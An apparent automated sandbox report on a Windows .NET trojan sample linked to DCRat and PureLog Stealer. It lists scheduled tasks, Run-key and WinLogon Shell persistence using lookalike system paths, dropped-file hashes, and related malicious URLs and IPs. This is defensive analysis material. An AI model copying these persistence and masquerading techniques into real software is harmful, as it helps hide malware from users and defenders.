            Sample name:XPC5PMKegV.exe
            renamed because original name is a hash value
            Original Sample Name:20cf7f39edef3db30f388829c5a3f05c.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@42/29@0/1
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 73%
            • Number of executed functions: 559
            • Number of non-executed functions: 8
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 40.127.169.103, 20.166.126.56, 13.95.31.18
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5060 because it is empty
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 6320 because it is empty
            • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 6840 because it is empty
            • Execution Graph export aborted for target System.exe, PID 1600 because it is empty
            • Execution Graph export aborted for target System.exe, PID 1708 because it is empty
            • Execution Graph export aborted for target System.exe, PID 5764 because it is empty
            • Execution Graph export aborted for target XPC5PMKegV.exe, PID 4924 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 1912 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 5204 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6248 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6316 because it is empty
            • Execution Graph export aborted for target xMLVfJVxhYAkoCJ.exe, PID 6684 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: XPC5PMKegV.exe
            Time | Type | Description
            09:32:17 | API Interceptor | 19x Sleep call for process: Registry.exe modified
            09:32:28 | API Interceptor | 18x Sleep call for process: StartMenuExperienceHost.exe modified
            09:32:34 | API Interceptor | 18x Sleep call for process: System.exe modified
            09:32:46 | API Interceptor | 18x Sleep call for process: xMLVfJVxhYAkoCJ.exe modified
            15:31:56 | Task Scheduler | Run new task: xMLVfJVxhYAkoCJx path: "C:\Recovery\xMLVfJVxhYAkoCJ.exe"
            15:31:58 | Task Scheduler | Run new task: Registry path: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:31:58 | Task Scheduler | Run new task: RegistryR path: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:31:58 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:31:58 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:31:58 | Task Scheduler | Run new task: System path: "C:\Program Files (x86)\microsoft.net\System.exe"
            15:31:59 | Task Scheduler | Run new task: SystemS path: "C:\Program Files (x86)\microsoft.net\System.exe"
            15:31:59 | Task Scheduler | Run new task: xMLVfJVxhYAkoCJ path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:32:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:32:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:32:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:32:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:32:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:32:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:33:06 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            15:33:14 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            15:33:22 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            15:33:30 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files (x86)\microsoft.net\System.exe"
            15:33:46 | Autostart | Run: WinLogon Shell "C:\Recovery\xMLVfJVxhYAkoCJ.exe"
            15:33:55 | Autostart | Run: WinLogon Shell "C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe"
            15:34:03 | Autostart | Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            THEFIRST-ASRU | 2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.120.227.56
             | http://ledger-devices-sync.vercel.app/ | malicious | Unknown | 77.246.156.134
             | Liquidation.Loader.exe | malicious | DCRat, PureLog Stealer, zgRAT | 212.109.199.34
             | http://www.goo.su/JpY9S/ | malicious | Unknown | 80.87.194.210
             | ExeFile (233).exe | malicious | Emotet | 78.24.219.147
             | ExeFile (260).exe | malicious | Emotet | 78.24.219.147
             | ExeFile (267).exe | malicious | Emotet | 37.46.129.215
             | ExeFile (317).exe | malicious | Emotet | 78.24.219.147
             | ExeFile (333).exe | malicious | Emotet | 37.46.129.215
             | ExeFile (360).exe | malicious | Emotet | 78.24.219.147
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (776), with no line terminators
            Category:dropped
            Size (bytes):776
            Entropy (8bit):5.897167646645308
            Encrypted:false
            SSDEEP:24:yrIFNd2RSmgipxrUgV8jmYId2fZ+pUYISb1LEF:ywNd2d3Ly5Iqt81gF
            MD5:D675E989518B7EBE7AF118780F466FEC
            SHA1:0CD1D792A76142942459BE42C0C3E2FE45C1C7F0
            SHA-256:3DE2FC9164086599A674FF416E134F1027567736E756971009995D21030E2E76
            SHA-512:4806DAD8B59A0B7AA29E66C129126CF58818D8B2C7A09359C80E3235A445E88BC95A58CD95BE7A9F7BF43CBDCD3B3FA96CD472D3370FA8038F598FC56C37B15D
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (770), with no line terminators
            Category:dropped
            Size (bytes):770
            Entropy (8bit):5.903928876762416
            Encrypted:false
            SSDEEP:12:b3WrJ7b6qb8rN9rUfT2MwE8Ic/zCu7FMXen/+PtRVcjoduLtuJSjEcOFY1ElXMwZ:b3W1Sqb8762MSIJ8OVcjoitkQEsElXFZ
            MD5:5C5D484997454085A1CD860D30F8601A
            SHA1:3C145C6186269EB809CD482DE506B8AF5A9C17F6
            SHA-256:3BFC3D8045314723506562D7500C0EA80E420E0D61F66CA1C6FA86298D990B99
            SHA-512:1E211165E42F5918F3482A8257C299DE8CA155E51B3631F2C74442B21A9AE814C1DC7F84390B5391BFF943C41673885CCF1667B809673C449404E48E40360B33
            Malicious:false
            Preview:b8jdjwQHduFwgHs2B3cYDFXcKqXZaDEKDPDkgT0xPBZtIDLvjwNk63rWkGT3Y0raq4tRDIWsCoIBpnUHel0n0dOKhrAZ97YZU9DNU3rbafhRuqq6vMYxADkMqiuWI7sFQtrqkGwl3ZNV56a1BEnxikYQY1hvJVSdwcBB89VpZx4l0PQtI3UET4gqUaSsiBbhGuid5Y2Bs8YvqxaIkxmQAOJ16VqirmGYVWfGrxytASWVgu9h9JIvYLh1kqhjsTUF1AaUSUbx83Pr2yVLVIjheV9KznfAPOBr8QdgUpPorUwf5z8vVVOjuxkgAPeozbhu1itlVz1q34zKjeO9otp3Ab6Kq7fEKlzQwCnWFXageiqz7a6gAe9FvotZlj5YTwfSEiXh024RTJYcvGMPA9DqlufISNugcCMsCYvYDZpIkswmPQofWpXTtzqUDOOmHXzQ6qZWVyMkU4F3723CjPKwo39NraUyKCBM3fpi0RJhcx9ytxWKUMD1NCmCrMo5dXZR33AcMVLRGmT14Ke4DJe89K903n0omOEFXr50x489BvuksuIhsu1T3bRs3Jjjfgp2iOeMPnHJLf7OZYIIeT62WuL5ZM6nUYeeG2CdQ6REnrHYeDTeBbFLkwfxDiwDqdyxAcHhWo1iB2PonxbV3cm3TS4TWParJOXJ2UXB6vIWjhJsh0KPHaJO05esixKHOJYxeFwSZZZHTQTvILwgELjtEIS70ocIkAIZIWNbE1zsAC5kmsjWBoCDjptWwzcv6RgTI3
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (712), with no line terminators
            Category:dropped
            Size (bytes):712
            Entropy (8bit):5.880260746129729
            Encrypted:false
            SSDEEP:12:ULDs9hp5sndQVdVk5pSAdfE1tUDZZ1ooz8Mgo2ADIXWUblyPTknRxz9t8ninLZZv:CDCHynmVdVEpRVEHUDZZ1okT3Du5ByPq
            MD5:A7A4B269B22707E5C195773217BC625E
            SHA1:B4299F1F84AD22886C7A7D09B2CA95923C1A75FA
            SHA-256:FB2AEB6EC6A9DBFAF4EEA421C0B6F4066F0904ED60EFFE087396E5B525EAC808
            SHA-512:9C4597F33BE59245F90CC35FF070642B21FB39F6654EB1B17124BD87026C0B5A6F1CAB8A5162D6CFBD792480376DFA68A73A2D3A70DF925740B1AE473C1B9DCE
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (728), with no line terminators
            Category:dropped
            Size (bytes):728
            Entropy (8bit):5.8755850659553746
            Encrypted:false
            SSDEEP:12:uv2dtYGxAgG+ZfN3zygXq71kf1hHHTdQjRCrUFlA2azEPKVjw4pAeSOFj0J:uv2dtY2Gu5+gX39pJERzFlAVhVjwze5m
            MD5:D396354CA9CB861025303344358FBF9F
            SHA1:FC1872C6C048F40531FC9F40AE966998D470A932
            SHA-256:64114CAAE89F6C49ED48938D1343E70FD92764358F8FED0C969F9FF472BA9AAB
            SHA-512:CA4301371BA80A02773EDCB1C689BB1E97B4DD9985EF0F0DDE59FD40955EC5254A785DFA602F2FCB0AAD52FDC4D8676220500D2C0C47C288C5E3E331A1B7C0BB
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):277
            Entropy (8bit):5.747584032409476
            Encrypted:false
            SSDEEP:6:KwjHpclaMU98l/VP18jJo32W6yfOqGOEuVOgaDZUdiPqwC:nHpaaMm866mZyfOqGOHDLdYO
            MD5:43480D051DA514765FDAB6DC98CC8009
            SHA1:2CF6409703B6FC974BC45A1896A4F0C0E94366FB
            SHA-256:4AB89A5DB967A7229253D86D662A1D67D4DA3D282DE03BF91C9A760C2FCA7C75
            SHA-512:98EBC13064B39467CCAF22FB50CB1623F64DEC667E0DDF17AC85DFDD53B41A726E4CFED2C7D792CDF1BEF471CF701AB32F9E5F05D43E21308071A91A8A06709E
            Malicious:false
            Preview:inF1Hu38uRYjZHByeiiHD2cB3buFxAFUrPKKMybJi9dhQeuNRhN6QmNqLD8pAxLtME1K70mpHYiEZ4vYrhyQxJEFCe9I0vIuxtVMmjPa4hy1DIQQSj8d955D9wId1ezVPyQpjiwHRYWQUMC3Ns0Qxpv2yRM0awiZrclO1lrtx0MljoswtPPIoiikDY0RV5qez6i1kxCmBGd6cJTJiZGLhZvJ4BLduZX1JsvmG1M6MnHhFmI3Ers5ze7ZKZ7jmj1mslwuXqDrNK93SODR3SYDq
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (539), with no line terminators
            Category:dropped
            Size (bytes):539
            Entropy (8bit):5.871163038020988
            Encrypted:false
            SSDEEP:12:KdsVcf9NpsHvzwX/bV4GYwcUkNmWj8AgphUviHTHsuoVCLhcz:BCVnIvIjVYwLkQk8Ag3S+TMHaa
            MD5:17C701B757496C5AF13EA17145CE40B0
            SHA1:CA8D5F470258086E724BEB1EA1E9A666CC4E037B
            SHA-256:CBAA292B81099091FED48E297DA8B7C751AE7DF7B76A442DBD8EB47FFC36A762
            SHA-512:0766924F28757DF09D785842B12B654A391B357D705128EC8E86D26F0E6A347D9849173F32393DB694F214AE51A65B9CED6E6ABA6850E3A46AEB925CF0A87EC7
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Process:C:\Program Files (x86)\Microsoft.NET\System.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1830
            Entropy (8bit):5.3661116947161815
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
            MD5:FE86BB9E3E84E6086797C4D5A9C909F2
            SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
